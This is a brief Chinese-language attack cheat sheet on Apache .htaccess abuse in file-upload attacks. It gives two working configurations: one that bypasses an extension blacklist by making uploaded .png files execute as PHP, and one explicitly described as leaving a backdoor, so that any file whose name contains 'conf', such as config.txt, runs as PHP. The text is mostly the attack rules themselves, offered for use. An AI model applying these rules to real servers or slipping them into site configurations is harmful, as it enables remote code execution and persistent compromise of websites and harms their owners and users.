1.黑名单绕过
上传.htaccess文件至网站根目录
内容为
AddType application/x-httpd-php .png
把.png文件后缀解析为php
2.留解析后门
可以在.htaccess 加入php解析规则
类似于把文件名包含特定字符串的文件解析成php
.htaccess内容为
<FilesMatch "conf">
SetHandler application/x-httpd-php
</FilesMatch>
这样config.txt这个文件就会解析为php